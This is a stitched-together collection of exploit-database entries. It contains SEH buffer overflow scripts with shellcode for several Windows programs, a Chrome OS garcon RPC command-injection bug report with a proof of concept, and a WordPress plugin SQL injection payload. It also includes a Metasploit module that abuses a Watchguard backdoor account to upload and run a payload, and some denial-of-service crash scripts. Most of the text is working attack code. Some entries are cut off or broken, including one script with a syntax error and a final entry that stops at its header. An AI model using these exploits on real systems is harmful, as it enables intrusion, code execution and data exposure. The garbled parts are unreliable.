# Tested Version: 1.8.2
# Tested on OS: Windows 7 32bit
# Steps to Reproduce:
# Run the python exploit script, it will create a new file with the name
# "exploit.txt" just copy the text inside "exploit.txt" and start the program
# and click on "System Setup" in the "Save Path for Snapshot and Record file" field.
# Paste the content of "exploit.txt" and click on Save. You will see a calculator poped up.
#!/usr/bin/python
buffer = "A" * 260
NSEH = "\xeb\x06\x90\x90"
SEH = "\x01\x19\x0c\x6a"
nops = "\x90" * 400
#badchar \x00\x0a\x0d\x2f
#msfvenom calculator
buf = ""
buf += "\xba\x9a\x98\xaf\x7e\xdd\xc2\xd9\x74\x24\xf4\x5f\x29"
buf += "\xc9\xb1\x31\x83\xc7\x04\x31\x57\x0f\x03\x57\x95\x7a"
buf += "\x5a\x82\x41\xf8\xa5\x7b\x91\x9d\x2c\x9e\xa0\x9d\x4b"
buf += "\xea\x92\x2d\x1f\xbe\x1e\xc5\x4d\x2b\x95\xab\x59\x5c"
buf += "\x1e\x01\xbc\x53\x9f\x3a\xfc\xf2\x23\x41\xd1\xd4\x1a"
buf += "\x8a\x24\x14\x5b\xf7\xc5\x44\x34\x73\x7b\x79\x31\xc9"
buf += "\x40\xf2\x09\xdf\xc0\xe7\xd9\xde\xe1\xb9\x52\xb9\x21"
buf += "\x3b\xb7\xb1\x6b\x23\xd4\xfc\x22\xd8\x2e\x8a\xb4\x08"
buf += "\x7f\x73\x1a\x75\xb0\x86\x62\xb1\x76\x79\x11\xcb\x85"
buf += "\x04\x22\x08\xf4\xd2\xa7\x8b\x5e\x90\x10\x70\x5f\x75"
buf += "\xc6\xf3\x53\x32\x8c\x5c\x77\xc5\x41\xd7\x83\x4e\x64"
buf += "\x38\x02\x14\x43\x9c\x4f\xce\xea\x85\x35\xa1\x13\xd5"
buf += "\x96\x1e\xb6\x9d\x3a\x4a\xcb\xff\x50\x8d\x59\x7a\x16"
buf += "\x8d\x61\x85\x06\xe6\x50\x0e\xc9\x71\x6d\xc5\xae\x8e"
buf += "\x27\x44\x86\x06\xee\x1c\x9b\x4a\x11\xcb\xdf\x72\x92"
buf += "\xfe\x9f\x80\x8a\x8a\x9a\xcd\x0c\x66\xd6\x5e\xf9\x88"
buf += "\x45\x5e\x28\xeb\x08\xcc\xb0\xc2\xaf\x74\x52\x1b"
pad = "B" * (6384 - len(NSEH) - len(SEH) - len(buffer) - len(nops) - len(buf) )
payload = buffer + NSEH + SEH + nops + buf + pad
try:
f=open("exploit.txt","w")
print "[+] Creating %s bytes evil payload.." %len(payload)
f.write(payload)
f.close()
print "[+] File created!"
except:
print "File cannot be created"
======================= BUG DESCRIPTION =======================
There is a variety of RPC communication channels between the Chrome OS host
system and the crosvm guest. This bug report focuses on communication on TCP
port 8889, which is used by the "garcon" service.
Among other things, garcon is responsible for:
- sending URLs to be opened from the guest to the host
- telling the host which applications (more precisely, .desktop files) are
installed in the guest, so that the host can display them in the launcher
- telling the guest to launch applications when the user clicks on stuff in the
launcher
garcon uses gRPC, which is an RPC protocol that sends protobufs over plaintext
HTTP/2. (Other system components communicate with the VM over gRPC-over-vsock,
but garcon uses gRPC-over-TCP.) For some command types, the TCP connection is
initiated by the host; for others, it is initiated by the guest. Both guest and
host are listening on [::]:8889; however, the iptables rules of the host prevent
an outside host from simply connecting to those sockets.
However, Chrome OS apps running on the host (and I think also Android apps, but
I haven't tested that) are not affected by such restrictions. This means that a
Chrome OS app with the "Exchange data with any device on the local network or
internet" permission can open a gRPC socket to the guest's garcon (no
authentication required) and send a vm_tools.container.Garcon.LaunchApplication
RPC call to the guest. This RPC call takes two arguments:
// Request protobuf for launching an application in the container.
message LaunchApplicationRequest {
// The ID of the application to launch. This should correspond to an
// identifier for a .desktop file available in the container.
string desktop_file_id = 1;
// Files to pass as arguments when launching the application, if any, given
// as absolute paths within the container's filesystem.
repeated string files = 2;
}
"desktop_file_id" is actually a relative path to a .desktop file without the
".desktop". One preinstalled .desktop file in the VM is for the VIM editor.
"files" is an array of "paths" that should be provided to the application as
arguments - but actually, you can just pass in arbitrary arguments this way.
This only works for applications whose .desktop files permit passing arguments,
but vim.desktop does permit that.
VIM permits passing a VIM command to be executed on startup using the "--cmd"
flag, and a VIM command that starts with an exclamation mark is interpreted as
a shell command.
So in summary, you can execute arbitrary shell commands by sending a gRPC like
this to the VM:
vm_tools.container.Garcon.LaunchApplication({
desktop_file_id: 'vim',
files: [
'--cmd',
'!id>/tmp/owned'
]
})
For my PoC, since I didn't want to try directly speaking gRPC from inside a
Chrome app, I instead built an app that forwards the garcon port to the outside
network, and then connected to garcon from a normal Linux workstation.
Repro instructions are at the bottom of this bug report, under
"REPRO INSTRUCTIONS", but first I'll list a few other things about crosvm that
look interesting from a security perspective.
Because of this issue, and because of the routing issue described below, I
strongly recommend getting rid of TCP-based communication with the VM entirely.
The various other inter-VM socket types that are already used should be more
than sufficient.
======================= RANDOM OBSERVATIONS =======================
This section lists a bunch of things that I haven't written full PoCs for so far,
but that look interesting or bad from a security perspective:
------------------- ROUTING TABLE -------------------
It is possible for a malicious wifi router to get packets from the host-side
garcon RPC endpoint. You might be able to do bad stuff to a Chrome OS
device over the network using this, but I haven't fully tested this yet.
Normally, when you connect the Chrome OS device to a wifi network, the routing
table looks as follows:
localhost / # route -n
Kernel IP routing table
Destination Gateway Genmask Flags Metric Ref Use Iface
0.0.0.0 192.168.246.1 0.0.0.0 UG 1 0 0 wlan0
100.115.92.0 0.0.0.0 255.255.255.252 U 0 0 0 arcbr0
100.115.92.4 0.0.0.0 255.255.255.252 U 0 0 0 vmtap0
100.115.92.192 100.115.92.6 255.255.255.240 UG 0 0 0 vmtap0
192.168.246.0 0.0.0.0 255.255.255.0 U 0 0 0 wlan0
Routing precedence depends on prefix length; more specific routes take
precedence over the default route. The 100.115.92.192/28 route is the most
specific one for traffic to the VM at 100.115.92.204, so that is the route used
for RPC calls to that IP address.
However, the wifi router can supply routing information that influences the
routing table. By modifying the wifi router's settings and reconnecting the
Chrome OS device, I get the following routing table in Chrome OS:
localhost / # route -n
Kernel IP routing table
Destination Gateway Genmask Flags Metric Ref Use Iface
0.0.0.0 100.115.92.201 0.0.0.0 UG 1 0 0 wlan0
8.8.8.8 100.115.92.201 255.255.255.255 UGH 0 0 0 wlan0
100.115.92.0 0.0.0.0 255.255.255.252 U 0 0 0 arcbr0
100.115.92.4 0.0.0.0 255.255.255.252 U 0 0 0 vmtap0
100.115.92.192 100.115.92.6 255.255.255.240 UG 0 0 0 vmtap0
100.115.92.200 0.0.0.0 255.255.255.248 U 0 0 0 wlan0
Now the 100.115.92.200/29 route pointing to wlan0 takes precedence over the
legitimate 100.115.92.192/28 route. I then told my router to respond to ARP
queries for 100.115.92.204 (the VM's IP) and ran wireshark on the wifi router
while connecting the ChromeOS device to it. I observed a TCP ACK packet coming
in on port 8889, from 100.115.92.5, with the following payload:
00000000 00 00 19 01 04 00 00 00 09 c7 c6 be c4 c3 c2 c1 ........ ........
00000010 c0 00 0c 67 72 70 63 2d 74 69 6d 65 6f 75 74 02 ...grpc- timeout.
00000020 32 53 00 00 2S..
I also got a TCP SYN packet on port 2222 (that's the port on which OpenSSH
listens in the VM).
------------------- SSHFS -------------------
When the user wishes to access the guest's filesystem from the host, sshfs is
used - a FUSE filesystem that uses ssh to interact with sftp-server on the
remote side.
sshfs runs with CAP_SYS_CHOWN, CAP_SETGID, CAP_SETUID and CAP_SYS_ADMIN, and
those privileges are even inherited by the ssh process.
------------------- VIRTIO WAYLAND -------------------
The crosvm host process implements a virtio protocol for Wayland. This is
described as follows in the guest kernel driver:
* Virtio Wayland (virtio_wl or virtwl) is a virtual device that allows a guest
* virtual machine to use a wayland server on the host transparently (to the
* host). This is done by proxying the wayland protocol socket stream verbatim
* between the host and guest over 2 (recv and send) virtio queues. The guest
* can request new wayland server connections to give each guest wayland client
* a different server context. Each host connection's file descriptor is exposed
* to the guest as a virtual file descriptor (VFD). Additionally, the guest can
* request shared memory file descriptors which are also exposed as VFDs. These
* shared memory VFDs are directly writable by the guest via device memory
* injected by the host. Each VFD is sendable along a connection context VFD and
* will appear as ancillary data to the wayland server, just like a message from
* an ordinary wayland client. When the wayland server sends a shared memory
* file descriptor to the client (such as when sending a keymap), a VFD is
* allocated by the device automatically and its memory is injected into as
* device memory.
Note the "verbatim" - as far as I can tell, the host component is not filtering
anything, but just plumbs the wayland traffic straight into the
/run/chrome/wayland-0 socket, on which the chrome browser process is listening.
If I read the code correctly, the low-level parsing of wayland RPCs is then
performed using the C code in libwayland, while the high-level handling of a
bunch of RPCs is done in C++ code in Chrome in src/components/exo/wayland/.
======================= REPRO INSTRUCTIONS =======================
Tested on: "10820.0.0 (Official Build) dev-channel eve"
Switch your Chrome OS victim machine to the dev channel so that the Linux VM
feature becomes available.
Set up a wifi network on which direct connections between machines are permitted,
and connect the victim device to it.
Open the Chrome OS settings. Enable "Linux (Beta)", wait for the install process
to complete, then launch crosvm by clicking the Terminal icon in the launcher.
In the guest OS terminal, determine the container's IP address with "ip addr".
For me, the address is 100.115.92.204, but it seems to change when you
reinstall the container.
On the attacker machine, run
"socat -d TCP-LISTEN:1335,reuseaddr TCP-LISTEN:1336,reuseaddr".
This is just a TCP server that copies data between a client on TCP port 1335
(must connect first) and a client on TCP port 1336.
On the host, unzip garcon_forwarder.zip and load it as unpacked app. Then
open "garcon forwarder" from the launcher, fill in the correct IP addresses, and
press "run". You should see a little bit of hexdump appearing in the app.
On the attacker machine, install nodejs, then, in a folder containing
container_guest.proto:
$ npm install grpc
[...]
$ npm install @grpc/proto-loader
[...]
$ node
> var grpc = require('grpc');
undefined
> var protoLoader = require('@grpc/proto-loader');
undefined
> var packageDefinition = protoLoader.loadSync('./container_guest.proto', {keepCase: true, longs: String, enums: String, defaults: true, oneofs: true});
undefined
> var protoDescriptor = grpc.loadPackageDefinition(packageDefinition);
undefined
> var stub = new protoDescriptor.vm_tools.container.Garcon('localhost:1336', grpc.credentials.createInsecure());
undefined
> stub.launchApplication({desktop_file_id:'vim',files:['--cmd','!id>/tmp/owned']}, function() {console.log(arguments)});
ClientUnaryCall {
domain:
Domain {
domain: null,
_events:
{ removeListener: [Function: updateExceptionCapture],
newListener: [Function: updateExceptionCapture],
error: [Function: debugDomainError] },
_eventsCount: 3,
_maxListeners: undefined,
members: [] },
_events: {},
_eventsCount: 0,
_maxListeners: undefined,
call:
InterceptingCall {
next_call: InterceptingCall { next_call: null, requester: [Object] },
requester: undefined } }
> [Arguments] { '0': null, '1': { success: true, failure_reason: '' } }
At this point, in the garcon forwarder app, you should see this:
activating...
connected to garcon over socket 16
connected to attacker over socket 17
on socket 16, received:
00 00 12 04 00 00 00 00 00 00 04 00 00 ff ff 00 |................|
06 00 00 40 00 fe 03 00 00 00 01 00 00 04 08 00 |...@............|
00 00 00 00 7f ff 00 00 |........|
on socket 17, received:
50 52 49 20 2a 20 48 54 54 50 2f 32 2e 30 0d 0a |PRI * HTTP/2.0..|
0d 0a 53 4d 0d 0a 0d 0a 00 00 24 04 00 00 00 00 |..SM......$.....|
00 00 02 00 00 00 00 00 03 00 00 00 00 00 04 00 |................|
40 00 00 00 05 00 40 00 00 00 06 00 00 20 00 fe |@.....@...... ..|
03 00 00 00 01 00 00 04 08 00 00 00 00 00 00 3f |...............?|
00 01 00 00 08 06 00 00 00 00 00 00 00 00 00 00 |................|
00 00 00 |...|
on socket 17, received:
00 01 2b 01 04 00 00 00 01 40 07 3a 73 63 68 65 |..+......@.:sche|
6d 65 04 68 74 74 70 40 07 3a 6d 65 74 68 6f 64 |me.http@.:method|
04 50 4f 53 54 40 0a 3a 61 75 74 68 6f 72 69 74 |.POST@.:authorit|
79 0e 6c 6f 63 61 6c 68 6f 73 74 3a 31 33 33 36 |y.localhost:1336|
40 05 3a 70 61 74 68 2c 2f 76 6d 5f 74 6f 6f 6c |@.:path,/vm_tool|
73 2e 63 6f 6e 74 61 69 6e 65 72 2e 47 61 72 63 |s.container.Garc|
6f 6e 2f 4c 61 75 6e 63 68 41 70 70 6c 69 63 61 |on/LaunchApplica|
74 69 6f 6e 40 02 74 65 08 74 72 61 69 6c 65 72 |tion@.te.trailer|
73 40 0c 63 6f 6e 74 65 6e 74 2d 74 79 70 65 10 |s@.content-type.|
61 70 70 6c 69 63 61 74 69 6f 6e 2f 67 72 70 63 |application/grpc|
40 0a 75 73 65 72 2d 61 67 65 6e 74 3c 67 72 70 |@.user-agent<grp|
63 2d 6e 6f 64 65 2f 31 2e 31 33 2e 30 20 67 72 |c-node/1.13.0 gr|
70 63 2d 63 2f 36 2e 30 2e 30 2d 70 72 65 31 20 |pc-c/6.0.0-pre1 |
28 6c 69 6e 75 78 3b 20 63 68 74 74 70 32 3b 20 |(linux; chttp2; |
67 6c 6f 72 69 6f 73 61 29 40 14 67 72 70 63 2d |gloriosa)@.grpc-|
61 63 63 65 70 74 2d 65 6e 63 6f 64 69 6e 67 15 |accept-encoding.|
69 64 65 6e 74 69 74 79 2c 64 65 66 6c 61 74 65 |identity,deflate|
2c 67 7a 69 70 40 0f 61 63 63 65 70 74 2d 65 6e |,gzip@.accept-en|
63 6f 64 69 6e 67 0d 69 64 65 6e 74 69 74 79 2c |coding.identity,|
67 7a 69 70 00 00 04 08 00 00 00 00 01 00 00 00 |gzip............|
05 00 00 21 00 01 00 00 00 01 00 00 00 00 1c 0a |...!............|
03 76 69 6d 12 05 2d 2d 63 6d 64 12 0e 21 69 64 |.vim..--cmd..!id|
3e 2f 74 6d 70 2f 6f 77 6e 65 64 00 00 04 08 00 |>/tmp/owned.....|
00 00 00 00 00 00 00 05 |........|
on socket 16, received:
00 00 00 04 01 00 00 00 00 00 00 08 06 01 00 00 |................|
00 00 00 00 00 00 00 00 00 00 |..........|
on socket 16, received:
00 00 58 01 04 00 00 00 01 40 07 3a 73 74 61 74 |..X......@.:stat|
75 73 03 32 30 30 40 0c 63 6f 6e 74 65 6e 74 2d |us.200@.content-|
74 79 70 65 10 61 70 70 6c 69 63 61 74 69 6f 6e |type.application|
2f 67 72 70 63 40 14 67 72 70 63 2d 61 63 63 65 |/grpc@.grpc-acce|
70 74 2d 65 6e 63 6f 64 69 6e 67 15 69 64 65 6e |pt-encoding.iden|
74 69 74 79 2c 64 65 66 6c 61 74 65 2c 67 7a 69 |tity,deflate,gzi|
70 00 00 07 00 00 00 00 00 01 00 00 00 00 02 08 |p...............|
01 00 00 0f 01 05 00 00 00 01 40 0b 67 72 70 63 |..........@.grpc|
2d 73 74 61 74 75 73 01 30 |-status.0|
Now, in the Linux VM, you can see the created file:
gjannhtest1@penguin:~$ cat /tmp/owned
uid=1000(gjannhtest1) gid=1000(gjannhtest1) groups=1000(gjannhtest1),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),44(video),46(plugdev),100(users)
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/45407.zip
# Exploit Title: Socusoft Photo to Video Converter 8.07 - 'Registration Name' Buffer Overflow
# Exploit Author : ZwX
# Exploit Date: 2018-09-13
# Vendor Homepage : http://www.dvd-photo-slideshow.com/photo-to-video-converter.html
# Version Software : 8.07
# Tested on OS: Windows 7
# Related Exploit Link : https://www.exploit-db.com/exploits/45353/
'''
Steps to Reproduce:
===================
1.Download and install Photo to Video Converter Professional
2.Run the python operating script that will create a file (poc.txt)
3.Run the software "" then go to Menu -> Help -> Save
4.Paste the contents of the file (poc.txt) into the input "Registration Name" and click "Activate"
5.Now the calculator executes!
'''
#!/usr/bin/python
from struct import pack
buffer = "\x41" * 256
a = "\xeb\x06\xff\xff"
b = pack("<I",0x10015d71)
calc=("\xdb\xd7\xd9\x74\x24\xf4\xb8\x79\xc4\x64\xb7\x33\xc9\xb1\x38"
"\x5d\x83\xc5\x04\x31\x45\x13\x03\x3c\xd7\x86\x42\x42\x3f\xcf"
"\xad\xba\xc0\xb0\x24\x5f\xf1\xe2\x53\x14\xa0\x32\x17\x78\x49"
"\xb8\x75\x68\xda\xcc\x51\x9f\x6b\x7a\x84\xae\x6c\x4a\x08\x7c"
"\xae\xcc\xf4\x7e\xe3\x2e\xc4\xb1\xf6\x2f\x01\xaf\xf9\x62\xda"
"\xa4\xa8\x92\x6f\xf8\x70\x92\xbf\x77\xc8\xec\xba\x47\xbd\x46"
"\xc4\x97\x6e\xdc\x8e\x0f\x04\xba\x2e\x2e\xc9\xd8\x13\x79\x66"
"\x2a\xe7\x78\xae\x62\x08\x4b\x8e\x29\x37\x64\x03\x33\x7f\x42"
"\xfc\x46\x8b\xb1\x81\x50\x48\xc8\x5d\xd4\x4d\x6a\x15\x4e\xb6"
"\x8b\xfa\x09\x3d\x87\xb7\x5e\x19\x8b\x46\xb2\x11\xb7\xc3\x35"
"\xf6\x3e\x97\x11\xd2\x1b\x43\x3b\x43\xc1\x22\x44\x93\xad\x9b"
"\xe0\xdf\x5f\xcf\x93\xbd\x35\x0e\x11\xb8\x70\x10\x29\xc3\xd2"
"\x79\x18\x48\xbd\xfe\xa5\x9b\xfa\xf1\xef\x86\xaa\x99\xa9\x52"
"\xef\xc7\x49\x89\x33\xfe\xc9\x38\xcb\x05\xd1\x48\xce\x42\x55"
"\xa0\xa2\xdb\x30\xc6\x11\xdb\x10\xa5\xaf\x7f\xcc\x43\xa1\x1b"
"\x9d\xe4\x4e\xb8\x32\x72\xc3\x34\xd0\xe9\x10\x87\x46\x91\x37"
"\x8b\x15\x7b\xd2\x2b\xbf\x83")
nops = "\x90" * 20
c = "\x44" * 800
poc = buffer + a + b + nops + calc + c
file = open("poc.txt","w")
file.write(poc)
file.close()
print "POC Created by ZwX"
# Exploit Title: Wordpress Plugin Survey & Poll 1.5.7.3 - 'sss_params' SQL Injection
# Date: 2018-09-09
# Exploit Author: Ceylan Bozogullarindan
# Vendor Homepage: http://modalsurvey.pantherius.com/
# Software Link: https://downloads.wordpress.org/plugin/wp-survey-and-poll.zip
# Version: 1.5.7.3
# Tested on: Windows 10
# CVE: N\A
# Description
# The vulnerability allows an attacker to inject sql commands using a value of a cookie parameter.
# PoC
# Step 1. When you visit a page which has a poll or survey, a question will be appeared for answering.
# Answer that question.
# Step 2. When you answer the question, wp_sap will be assigned to a value. Open a cookie manager,
# and change it with the payload showed below;
["1650149780')) OR 1=2 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,@@version,11#"]
# It is important that the "OR" statement must be 1=2. Because, application is reflecting the first result
# of the query. When you make it 1=1, you should see a question from firt record.
# Therefore OR statement must be returned False.
# Step 3. Reload the page. Open the source code of the page. Search "sss_params".
# You will see the version of DB in value of sss_params parameter.
# The Request
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: wp_sap=["1650149780')) OR 1=2 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,@@version,11#"]
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
# The result from source code of the page
<script type='text/javascript'>
/* <![CDATA[ */
var sss_params = {"survey_options":"{\"options\":\"[\\\"center\\\",\\\"easeInOutBack\\\",\\\"\\\",\\\"-webkit-linear-gradient(top , rgb(5, 40, 242) 13% , rgb(204, 204, 204) 70%);-moz-linear-gradient(top , rgb(5, 40, 242) 13% , rgb(204, 204, 204) 70%);-ms-linear-gradient(top , rgb(5, 40, 242) 13% , rgb(204, 204, 204) 70%);-o-linear-gradient(top , rgb(5, 40, 242) 13% , rgb(204, 204, 204) 70%);linear-gradient(top , rgb(5, 40, 242) 13% , rgb(204, 204, 204) 70%);\\\",\\\"rgb(0, 0, 0)\\\",\\\"rgb(93, 93, 93)\\\",\\\"1\\\",\\\"5\\\",\\\"12\\\",\\\"10\\\",\\\"12\\\",500,\\\"Thank you for your feedback!\\\",\\\"0\\\",\\\"0\\\",\\\"0\\\"]\",\"plugin_url\":\"http:\\\/\\\/www.*****.com\\\/wp-content\\\/plugins\\\/wp-survey-and-poll\",\"admin_url\":\"http:\\\/\\\/www.******.com\\\/wp-admin\\\/admin-ajax.php\",\"survey_id\":\"1101225978\",\"style\":\"modal\",\"expired\":\"false\",\"debug\":\"true\",\"questions\":[[\"Are You A First Time Home Buyer?\",\"Yes\",\"No\"],[\>>>>>>"10.1.36-MariaDB-1~trusty\"<<<<<<<]]}"};
/* ]]> */
</script>
DB version: "10.1.36-MariaDB-1~trusty"....
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
def initialize(info={})
super(update_info(info,
'Name' => 'Watchguard AP Backdoor Shell',
'Description' => 'Watchguard AP\'s have a backdoor account with known credentials. This can be used to
gain a valid web session on the HTTP administration interface. The administrator
can then upload a shell directly to the web root to execute it.
This module can also be used if you have legitimate access credentials to the device.',
'References' =>
[
['CVE', 'CVE-2018-10575'],
['CVE', 'CVE-2018-10576'],
['CVE', 'CVE-2018-10577'],
['URL', 'http://seclists.org/fulldisclosure/2018/May/12'],
['URL', 'https://watchguardsupport.secure.force.com/publicKB?type=KBSecurityIssues&SFDCID=kA62A0000000LIy'],
],
'Author' => 'Stephen Shkardoon ', # ss23 / @ss2342
'License' => MSF_LICENSE,
'Platform' => 'linux',
'Targets' => [ [ 'Automatic', { } ] ],
'DefaultTarget' => 0,
'Arch' => ARCH_MIPSBE,
))
register_options(
[
Opt::RPORT(443),
#Opt::SSL(true),
OptString.new('WG_USER', [ true, 'The username to authenticate as', 'admin']),
OptString.new('WG_PASS', [ true, 'The password for the specified username', '1234']),
])
end
def exploit
begin
res = send_request_cgi({
'method' => 'GET',
'uri' => '/cgi-bin/luci/',
'headers' => {
'AUTH_USER' => datastore['WG_USER'],
'AUTH_PASS' => datastore['WG_PASS'],
},
})
if res.nil? || res.get_cookies.empty?
fail_with(Failure::NotFound, 'Unable to obtain a valid session with provided credentials')
end
# We have a valid session, so we should pull out the access credentials and find the serial number
sysauth = res.get_cookies.scan(/(sysauth=\w+);*/).flatten[0]
stok = res.redirection.to_s.scan(/;(stok=\w+)/).flatten[0]
vprint_status("Got sysauth #{sysauth}")
vprint_status("Got stok #{stok}")
res = send_request_cgi({
'method' => 'GET',
'uri' => "/cgi-bin/luci/;#{stok}/html/Status",
'headers' => {
'AUTH_USER' => datastore['WG_USER'],
'AUTH_PASS' => datastore['WG_PASS'],
},
'cookie' => sysauth,
})
if res.nil? || res.code != 200
fail_with(Failure::NotFound, 'Unable to request serial')
end
# Pull out the serial and store it for later
# var device_serial = "20AP0XXXXXXXX";
if res.body.match(/device_serial = "(\w+)";/)
serial = $1
else
fail_with(Failure::NotFound, 'Unable to find serial in response')
end
vprint_status("Got serial #{serial}")
# Finally, upload our payloads
res = send_request_cgi({
'method' => 'POST',
'uri' => "/cgi-bin/luci/;#{stok}/wgupload",
'headers' => {
'AUTH_USER' => datastore['WG_USER'],
'AUTH_PASS' => datastore['WG_PASS'],
},
'cookie' => "#{sysauth}; serial=#{serial}; filename=/tmp/payload; md5sum=fail",
'data' => payload.encoded_exe,
})
if res.nil? || res.code != 205
fail_with(Failure::NotFound, "Could not upload file 1: #{res.body}")
end
# Upload the lua script that executes our payload
res = send_request_cgi({
'method' => 'POST',
'uri' => "/cgi-bin/luci/;#{stok}/wgupload",
'headers' => {
'AUTH_USER' => datastore['WG_USER'],
'AUTH_PASS' => datastore['WG_PASS'],
},
'cookie' => "#{sysauth}; serial=#{serial}; filename=/www/cgi-bin/payload.luci; md5sum=fail",
'data' => "#!/usr/bin/lua
os.execute('/bin/chmod +x /tmp/payload');
os.execute('/tmp/payload');"
})
if res.nil? || res.code != 205
fail_with(Failure::NotFound, "Could not upload file 1: #{res.body}")
end
# Remove the trigger script once we've got a shell
register_file_for_cleanup("/www/cgi-bin/payload.luci")
vprint_status("Uploaded lua script")
# Trigger our payload
res = send_request_cgi({
'method' => 'GET',
'uri' => "/cgi-bin/payload.luci",
})
vprint_status("Requested lua payload")
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
vprint_error("Failed to connect to the web server")
return nil
end
end
end
# Exploit Title: CdBurnerXP 4.5.8.6795 - 'File Name' Denial of Service (PoC)
# Discovery by: Alan Baeza
# Discovery Date: 2018-09-13
# Vendor Homepage: https://cdburnerxp.se/
# Software Link: https://cdburnerxp.se/downloadsetup.exe
# Tested Version: 4.5.8.6795
# Tested on OS : Windows 10 Pro x64 es
#!/usr/bin/env python
#-*-coding: utf-8-*-
# Steps to Produce the DoS:
# 1.- Run python code : python dos.py
# 2.- Open generate.txt and copy content to clipboard
# 3.- Open CdBurnerXP
# 4.- Select option "Copy or grab disc"
# 5.- Select checkbox target "Hard disk"
# 6.- Paste ClipBoard on "File name"
# 7.- Clic Copy disc
# 8.- DoS
import socket, os, sys
buffer = "\x41" * 260
f = open ("generate.txt", "w")
f.write(buffer)
f.close()
# Exploit Title: InfraRecorder 0.53 - '.txt' Denial of Service (PoC)
# Date: 2018-09-14
# Exploit Author: Gionathan "John" Reale
# Version: version 0.53
# Download: http://sourceforge.net/projects/infrarecorder/files/InfraRecorder/0.53/ir053.exe/download
# Tested on: Windows 7 32bit
# Steps to Reproduce:
# Run the python exploit script, it will create a new file with the name "exploit.txt".
# Start the program and click "Edit" > "Import... "
# Find the file "exploit.txt" and click "Open"
# You will see a crash!
#!/usr/bin/python
buffer = "A" * 6000
payload = buffer
try:
f=open("exploit.txt","w")
print "[+] Creating %s bytes evil payload.." %len(payload)
f.write(payload)
f.close()
print "[+] File created!"
except:
print "File cannot be created"
# Exploit Title: Free MP3 CD Ripper 2.6 - '.wma' Buffer Overflow (SEH)
# Author: Gionathan "John" Reale
# Discovey Date: 2018-09-13
# Software Link: http://www.commentcamarche.net/download/telecharger-34082200-free-mp3-cd-ripper
# Tested on OS: Windows 7 32bit
# Tested Version: 2.6
# Steps to Reproduce:
# Run the python exploit script, it will create a new file with the name "exploit.wma".
# Start the program and click on "Convert".
# Find the file "exploit.wma" and click "Open"
# You will see a calculator poped up.
#!/usr/bin/python
buffer = "A" * 4116
NSEH = "\xeb\x06\x90\x90"
SEH = "\x21\x21\xe4\x66"
nops = "\x90" * 8
#badchar \x00\x0a\x0d\x2f
#msfvenom calculator
buf = ""
buf += "\xba\x9a\x98\xaf\x7e\xdd\xc2\xd9\x74\x24\xf4\x5f\x29"
buf += "\xc9\xb1\x31\x83\xc7\x04\x31\x57\x0f\x03\x57\x95\x7a"
buf += "\x5a\x82\x41\xf8\xa5\x7b\x91\x9d\x2c\x9e\xa0\x9d\x4b"
buf += "\xea\x92\x2d\x1f\xbe\x1e\xc5\x4d\x2b\x95\xab\x59\x5c"
buf += "\x1e\x01\xbc\x53\x9f\x3a\xfc\xf2\x23\x41\xd1\xd4\x1a"
buf += "\x8a\x24\x14\x5b\xf7\xc5\x44\x34\x73\x7b\x79\x31\xc9"
buf += "\x40\xf2\x09\xdf\xc0\xe7\xd9\xde\xe1\xb9\x52\xb9\x21"
buf += "\x3b\xb7\xb1\x6b\x23\xd4\xfc\x22\xd8\x2e\x8a\xb4\x08"
buf += "\x7f\x73\x1a\x75\xb0\x86\x62\xb1\x76\x79\x11\xcb\x85"
buf += "\x04\x22\x08\xf4\xd2\xa7\x8b\x5e\x90\x10\x70\x5f\x75"
buf += "\xc6\xf3\x53\x32\x8c\x5c\x77\xc5\x41\xd7\x83\x4e\x64"
buf += "\x38\x02\x14\x43\x9c\x4f\xce\xea\x85\x35\xa1\x13\xd5"
buf += "\x96\x1e\xb6\x9d\x3a\x4a\xcb\xff\x50\x8d\x59\x7a\x16"
buf += "\x8d\x61\x85\x06\xe6\x50\x0e\xc9\x71\x6d\xc5\xae\x8e"
buf += "\x27\x44\x86\x06\xee\x1c\x9b\x4a\x11\xcb\xdf\x72\x92"
buf += "\xfe\x9f\x80\x8a\x8a\x9a\xcd\x0c\x66\xd6\x5e\xf9\x88"
buf += "\x45\x5e\x28\xeb\x08\xcc\xb0\xc2\xaf\x74\x52\x1b"
pad = "B" * (4440 - len(NSEH) - len(SEH) - len(buffer) - len(nops) - len(buf) )
payload = buffer + NSEH + SEH + nops + buf + pad
try:
f=open("exploit.wma","w")
print "[+] Creating %s bytes evil payload.." %len(payload)
f.write(payload)
f.close()
print "[+] File created!"
except:
print "File cannot be created"
# Exploit Title : Notebook Pro 2.0 - Denial Of Service (PoC)
# Exploit Author : Ali Alipour
# WebSite : http://Alipour.it
# Date: 2018-09-14
# Vendor Homepage : http://www.stokedonit.com/apps/notebook-pro/
# Software Link Download : https://www.microsoft.com/store/apps/9WZDNCRDMC76
# Tested on : Windows 10 - 64-bit
# Steps to Reproduce
# Run the python exploit script, it will create a new
# file with the name "Notebook.txt" just copy the text inside "Notebook.txt"
# and start the Notebook Pro 2.0 - In Microsoft Windows 10 .
# In The New Window Click On " New " And Click On notebook Button ( Create a New NoteBook ) .
# Now Paste The Content Of "Notebook.txt" Into The Field: " New NoteBook Name ".
# Click "Create & Save" And You Will See a [ Boom !!!! ] - Notebook Pro 2.0 - In Microsoft Windows 10 [ Crash ].
#!/usr/bin/python
buffer = "A" * 500
payload = buffer
try:
f=open("Notebook.txt",22"w")
print "[+] Creating %s bytes evil payload.." %len(payload)
f.write(payload)
f.close()
print "[+] File created!"
except:
print "File cannot be created"
# Exploit Title: XAMPP Control Panel 3.2.2 - Denial of Service (PoC)
# Exploit Author: Gionathan "John" Reale
# Date: 2018-09-14
# Software: XAMPP
# Version: 3.2.2 / 7.2.9 (Newest version at time of writing)
